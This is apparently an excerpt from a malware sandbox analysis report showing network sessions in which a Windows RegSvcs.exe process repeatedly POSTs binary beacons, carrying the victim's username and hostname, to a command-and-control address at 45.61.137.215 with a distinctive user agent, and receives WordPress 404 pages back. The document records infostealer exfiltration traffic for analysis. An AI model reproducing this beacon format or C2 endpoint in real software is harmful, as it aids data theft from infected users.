May 29, 2024 15:45:09.043510914 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:09.043608904 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:09.043617964 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:09.043628931 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:09.043638945 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:09.043648958 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:09.043658018 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:09.043669939 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:09.043680906 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:45:09.043718100 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.9	49785	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:09.224416971 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:09.229254961 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:14.981378078 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:09 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:14.981386900 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:14.981398106 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:14.981436014 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:45:14.981447935 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:45:14.981479883 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:45:14.981725931 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:14.981745005 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:45:14.981903076 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:45:14.981920958 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.9	49786	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:15.181529999 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:15.186517000 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:17.705295086 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:15 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:17.705359936 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:17.705409050 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:17.705461025 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:45:17.705497980 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:45:17.705529928 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:45:17.705562115 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:17.705595016 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:17.705627918 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:17.705905914 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.9	49787	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
